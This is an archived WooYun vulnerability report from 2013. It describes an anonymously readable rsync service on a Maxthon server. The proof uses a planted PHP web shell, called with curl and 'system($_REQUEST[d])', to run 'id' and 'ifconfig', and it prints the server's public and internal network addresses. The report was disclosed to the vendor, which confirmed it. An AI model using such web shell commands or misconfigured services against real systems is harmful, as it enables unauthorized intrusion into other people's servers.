某服务配置不当导致遨游数据和内网沦陷 | wooyun-2013-038373

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2013-038373

漏洞标题：

某服务配置不当导致遨游数据和内网沦陷

漏洞详情

披露状态：

2013-09-27：细节已通知厂商并且等待厂商处理中
2013-09-27：厂商已经确认，细节仅向厂商公开
2013-10-07：细节向核心白帽子及相关领域专家公开
2013-10-17：细节向普通白帽子公开
2013-10-27：细节向实习白帽子公开
2013-11-11：细节向公众公开

简要描述：

一个典型的服务设置不当导致直接拿shell从而控制服务器和进行内网渗透

详细说明：

rsync 60.28.220.78::
blog           	
bbs            	
localhost:scan root$ rsync 60.28.220.78::bbs/
drwxrwxr-x        4096 2012/09/04 05:13:03 .
-rwxrwxr-x        4303 2009/09/15 13:09:41 admincp.php
-rwxrwxr-x        8235 2009/09/15 13:24:02 ajax.php
-rwxrwxr-x        1534 2009/09/15 13:09:41 announcement.php
-rwxrwxr-x        8324 2009/09/15 13:09:41 attachment.php
lrwxrwxrwx          24 2012/09/04 05:12:51 attachments
-rw-r--r--     2796002 2011/03/22 18:22:38 bbs-trunk.zip
-rwxrwxr-x        1953 2009/09/15 13:09:41 campaign.php
-rwxr-xr-x        4014 2012/08/14 10:54:26 config.inc.php
-rwxrwxr-x         106 2009/09/02 10:02:47 crossdomain.xml
-rwxrwxr-x      121996 2009/09/15 13:09:41 d60to70.php.tmp.bak
-rwxrwxr-x         147 2009/09/15 13:09:41 discuz_version.php
-rwxrwxr-x        8079 2009/09/15 13:09:41 eccredit.php
-rwxrwxr-x        4053 2009/09/15 13:09:41 faq.php
-rwxrwxrwx        1150 2011/03/21 17:10:27 favicon.ico
lrwxrwxrwx          21 2012/09/04 05:13:03 forumdata
-rwxrwxr-x       17463 2009/09/15 13:09:41 forumdisplay.php
-rwxrwxr-x        1260 2009/09/15 13:09:41 frame.php
-rwxrwxr-x       10032 2009/09/22 18:05:00 index.php
-rwxrwxr-x        4900 2009/09/15 13:09:41 invite.php
-rwxrwxr-x        1546 2009/09/15 13:09:41 leftmenu.php
-rwxrwxr-x       20227 2011/11/25 15:13:12 logging.php
-rwxrwxr-x       20611 2009/09/15 13:09:41 magic.php
-rwxrwxr-x        3302 2009/09/15 13:09:41 medal.php
-rwxrwxr-x       12943 2009/09/15 13:09:41 member.php
-rwxrwxr-x       37102 2009/09/15 13:09:41 memcp.php
-rwxrwxr-x       42767 2009/09/15 13:09:41 misc.php
-rwxrwxr-x        5603 2009/09/15 13:09:41 modcp.php
-rwxrwxr-x       32143 2009/11/26 18:37:32 my.php
-rwxrwxr-x         906 2009/09/15 13:09:41 plugin.php
-rwxrwxr-x       12698 2009/10/10 09:38:38 pm.php
-rwxrwxr-x       11586 2009/09/16 11:50:17 post.php
-rwxrwxr-x        3464 2009/09/15 13:09:41 redirect.php
-rwxrwxr-x       12427 2012/08/10 10:47:01 register.php
-rwxrwxr-x        3434 2009/09/15 13:09:41 relatekw.php
-rwxrwxr-x        5688 2009/09/15 13:09:41 relatethread.php
-rwxrwxr-x        8419 2009/10/10 16:43:16 reusername.php
-rwxrwxr-x         721 2009/09/02 10:02:47 robots.txt
-rwxrwxr-x        5898 2010/04/12 10:51:42 rss.php
-rwxrwxr-x       10227 2009/09/15 13:09:41 search.php
-rwxrwxr-x        2038 2009/09/15 13:09:41 seccode.php
-rwxrwxr-x        3521 2009/09/15 13:09:41 sitemap.php
-rwxrwxr-x        7688 2009/09/15 13:09:41 space.php
-rwxrwxr-x       38482 2009/10/21 13:25:32 stats.php
-rwxrwxr-x        5962 2009/09/15 13:09:41 tag.php
-rwxrwxr-x       16187 2009/09/15 13:09:41 task.php
-rwxrwxr-x          17 2009/10/23 14:42:20 test.php
-rwxrwxr-x        1044 2009/09/15 13:09:41 topic.php
-rwxrwxr-x       25242 2009/09/15 13:09:41 topicadmin.php
-rwxrwxr-x        9795 2009/09/15 13:09:41 trade.php
-rwxrwxr-x        1010 2009/09/15 13:09:41 video.php
-rwxrwxr-x       30266 2012/09/26 13:33:33 viewthread.php
drwxrwxr-x        4096 2011/03/22 18:17:44 __MACOSX
drwxrwxr-x        4096 2009/10/29 16:23:22 admin
drwxrwxr-x        4096 2009/09/27 21:45:46 api
drwxrwxr-x        4096 2009/09/27 21:45:46 archiver
drwxrwxr-x        4096 2009/09/27 16:32:05 attachments.local
drwxr-xr-x        4096 2011/03/22 18:23:18 css
drwxrwxr-x        4096 2009/09/27 21:45:46 forumdata.local
drwxrwxr-x        4096 2011/03/22 18:23:24 images
drwxrwxr-x        4096 2009/10/19 18:59:42 include
drwxrwxr-x        4096 2009/09/27 21:45:46 ipdata
drwxrwxr-x        4096 2011/05/25 14:39:12 maxthon
drwxrwxr-x        4096 2009/09/27 21:45:46 modcp
drwxrwxr-x        4096 2009/09/27 21:45:46 plugins
drwxr-xr-x        4096 2012/09/03 18:51:03 poll
drwxrwxr-x        4096 2011/03/22 18:23:30 templates
drwxrwxr-x        4096 2009/09/27 21:45:46 uc_client
drwxrwxr-x        4096 2009/09/27 21:45:46 uc_server
drwxrwxr-x        4096 2009/11/26 14:52:35 update20091128
drwxrwxr-x        4096 2013/09/26 21:35:01 wap

漏洞证明：

curl http://60.28.220.78/wap/1.php -d 'c=system($_REQUEST[d]);&d=id'
uid=80(www) gid=501(www) groups=501(www)
localhost:scan root$ curl http://60.28.220.78/wap/1.php -d 'c=system($_REQUEST[d]);&d=ifconfig'
eth0      Link encap:Ethernet  HWaddr 00:15:17:87:8E:40  
          inet addr:60.28.220.78  Bcast:60.28.220.127  Mask:255.255.255.192
          inet6 addr: fe80::215:17ff:fe87:8e40/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2704078494 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2636441801 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:777004890 (741.0 MiB)  TX bytes:218530086 (208.4 MiB)
          Memory:b8820000-b8840000 
eth1      Link encap:Ethernet  HWaddr 00:15:17:87:8E:41  
          inet addr:192.168.0.39  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::215:17ff:fe87:8e41/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2553857922 errors:0 dropped:0 overruns:0 frame:0
          TX packets:943152715 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3262742096 (3.0 GiB)  TX bytes:1230432064 (1.1 GiB)
          Memory:b8800000-b8820000 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1405875 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1405875 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:112412020 (107.2 MiB)  TX bytes:112412020 (107.2 MiB)
lo:0      Link encap:Local Loopback  
          inet addr:60.28.220.125  Mask:255.255.255.255
          UP LOOPBACK RUNNING  MTU:16436  Metric:1

修复方案：

不多说

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-09-27 19:56

厂商回复：

感谢提醒. 已转交开发.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云